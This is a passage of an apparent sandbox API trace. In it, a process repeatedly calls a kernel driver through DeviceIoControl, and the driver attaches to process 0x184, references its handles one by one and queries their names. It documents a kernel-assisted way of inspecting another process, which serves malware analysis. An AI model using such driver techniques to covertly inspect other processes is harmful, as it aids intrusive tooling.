lpOverlapped=0x0) returned 1 [0132.589] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.589] PsAcquireProcessExitSynchronization () returned 0x0 [0132.589] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.589] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c6f860, HandleInformation=0x0) returned 0x0 [0132.589] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.589] PsReleaseProcessExitSynchronization () returned 0x2 [0132.589] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.589] ObQueryNameString (in: Object=0xfffff8a000c6f860, ObjectNameInfo=0xfffffa800267c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800267c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.589] ObfDereferenceObject (Object=0xfffff8a000c6f860) returned 0x1 [0132.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.589] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.589] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.589] PsAcquireProcessExitSynchronization () returned 0x0 [0132.589] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.589] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c85750, HandleInformation=0x0) returned 0x0 [0132.590] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.590] PsReleaseProcessExitSynchronization () returned 0x2 [0132.590] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.590] ObQueryNameString (in: Object=0xfffff8a000c85750, ObjectNameInfo=0xfffffa800267b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800267b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.590] ObfDereferenceObject (Object=0xfffff8a000c85750) returned 0x1 [0132.590] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.590] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.590] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.590] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.590] PsAcquireProcessExitSynchronization () returned 0x0 [0132.590] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.590] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001571650, HandleInformation=0x0) returned 0x0 [0132.590] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.590] PsReleaseProcessExitSynchronization () returned 0x2 [0132.590] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.590] ObQueryNameString (in: Object=0xfffff8a001571650, ObjectNameInfo=0xfffffa8002656044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002656044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.590] ObfDereferenceObject (Object=0xfffff8a001571650) returned 0x1 [0132.590] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.590] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.590] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.591] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.591] PsAcquireProcessExitSynchronization () returned 0x0 [0132.591] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.591] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0014b2af0, HandleInformation=0x0) returned 0x0 [0132.591] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.591] PsReleaseProcessExitSynchronization () returned 0x2 [0132.591] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.591] ObQueryNameString (in: Object=0xfffff8a0014b2af0, ObjectNameInfo=0xfffffa8002640044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002640044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.591] ObfDereferenceObject (Object=0xfffff8a0014b2af0) returned 0x1 [0132.591] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.591] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.591] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.591] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.591] PsAcquireProcessExitSynchronization () returned 0x0 [0132.591] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.591] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f6a890, HandleInformation=0x0) returned 0x0 [0132.591] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.591] PsReleaseProcessExitSynchronization () returned 0x2 [0132.591] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.592] ObQueryNameString (in: Object=0xfffff8a000f6a890, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.592] ObfDereferenceObject (Object=0xfffff8a000f6a890) returned 0x1 [0132.592] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.592] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.592] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.592] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.592] PsAcquireProcessExitSynchronization () returned 0x0 [0132.592] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.592] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f8a750, HandleInformation=0x0) returned 0x0 [0132.592] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.592] PsReleaseProcessExitSynchronization () returned 0x2 [0132.592] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.592] ObQueryNameString (in: Object=0xfffff8a000f8a750, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.592] ObfDereferenceObject (Object=0xfffff8a000f8a750) returned 0x1 [0132.592] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.592] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.592] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.592] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.593] PsAcquireProcessExitSynchronization () returned 0x0 [0132.593] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.593] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f8d4f0, HandleInformation=0x0) returned 0x0 [0132.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.593] PsReleaseProcessExitSynchronization () returned 0x2 [0132.593] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.593] ObQueryNameString (in: Object=0xfffff8a000f8d4f0, ObjectNameInfo=0xfffffa800268c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800268c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.593] ObfDereferenceObject (Object=0xfffff8a000f8d4f0) returned 0x1 [0132.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.593] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.593] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.593] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.593] PsAcquireProcessExitSynchronization () returned 0x0 [0132.593] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.593] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f9e470, HandleInformation=0x0) returned 0x0 [0132.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.593] PsReleaseProcessExitSynchronization () returned 0x2 [0132.593] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.593] ObQueryNameString (in: Object=0xfffff8a000f9e470, ObjectNameInfo=0xfffffa80026a2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a2044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.593] ObfDereferenceObject (Object=0xfffff8a000f9e470) returned 0x1 [0132.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.593] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.594] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.594] PsAcquireProcessExitSynchronization () returned 0x0 [0132.594] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.594] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ff29f0, HandleInformation=0x0) returned 0x0 [0132.594] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.594] PsReleaseProcessExitSynchronization () returned 0x2 [0132.594] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.594] ObQueryNameString (in: Object=0xfffff8a000ff29f0, ObjectNameInfo=0xfffffa80026a7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a7044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.594] ObfDereferenceObject (Object=0xfffff8a000ff29f0) returned 0x1 [0132.594] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.594] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.594] PsAcquireProcessExitSynchronization () returned 0x0 [0132.594] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.595] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ffb110, HandleInformation=0x0) returned 0x0 [0132.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.595] PsReleaseProcessExitSynchronization () returned 0x2 [0132.595] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.595] ObQueryNameString (in: Object=0xfffff8a000ffb110, ObjectNameInfo=0xfffffa80026af044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026af044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.595] ObfDereferenceObject (Object=0xfffff8a000ffb110) returned 0x1 [0132.595] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.595] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.595] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.595] PsAcquireProcessExitSynchronization () returned 0x0 [0132.595] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.595] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f55bd0, HandleInformation=0x0) returned 0x0 [0132.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.595] PsReleaseProcessExitSynchronization () returned 0x2 [0132.595] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.595] ObQueryNameString (in: Object=0xfffff8a000f55bd0, ObjectNameInfo=0xfffffa80027e0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e0044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.595] ObfDereferenceObject (Object=0xfffff8a000f55bd0) returned 0x1 [0132.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.596] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.596] PsAcquireProcessExitSynchronization () returned 0x0 [0132.596] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.596] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010e9270, HandleInformation=0x0) returned 0x0 [0132.596] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.596] PsReleaseProcessExitSynchronization () returned 0x2 [0132.596] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.596] ObQueryNameString (in: Object=0xfffff8a0010e9270, ObjectNameInfo=0xfffffa80027f3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027f3044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.596] ObfDereferenceObject (Object=0xfffff8a0010e9270) returned 0x1 [0132.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.597] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.597] PsAcquireProcessExitSynchronization () returned 0x0 [0132.597] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.597] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010fb850, HandleInformation=0x0) returned 0x0 [0132.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.597] PsReleaseProcessExitSynchronization () returned 0x2 [0132.597] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.597] ObQueryNameString (in: Object=0xfffff8a0010fb850, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.597] ObfDereferenceObject (Object=0xfffff8a0010fb850) returned 0x1 [0132.597] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.597] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.597] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.597] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.597] PsAcquireProcessExitSynchronization () returned 0x0 [0132.597] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.597] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ca14f0, HandleInformation=0x0) returned 0x0 [0132.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.597] PsReleaseProcessExitSynchronization () returned 0x2 [0132.598] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.598] ObQueryNameString (in: Object=0xfffff8a000ca14f0, ObjectNameInfo=0xfffffa800284b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.598] ObfDereferenceObject (Object=0xfffff8a000ca14f0) returned 0x1 [0132.598] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.598] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.598] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.598] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.598] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.598] PsAcquireProcessExitSynchronization () returned 0x0 [0132.598] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.598] ObReferenceObjectByHandle (in: Handle=0x1ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0089fbe90, HandleInformation=0x0) returned 0x0 [0132.598] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.598] PsReleaseProcessExitSynchronization () returned 0x2 [0132.599] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.599] ObQueryNameString (in: Object=0xfffff8a0089fbe90, ObjectNameInfo=0xfffffa8002c25044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c25044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.599] ObfDereferenceObject (Object=0xfffff8a0089fbe90) returned 0x1 [0132.599] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.599] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.599] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.599] PsAcquireProcessExitSynchronization () returned 0x0 [0132.599] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.599] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00111bd00, HandleInformation=0x0) returned 0x0 [0132.599] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.599] PsReleaseProcessExitSynchronization () returned 0x2 [0132.599] ObfDereferenceObject 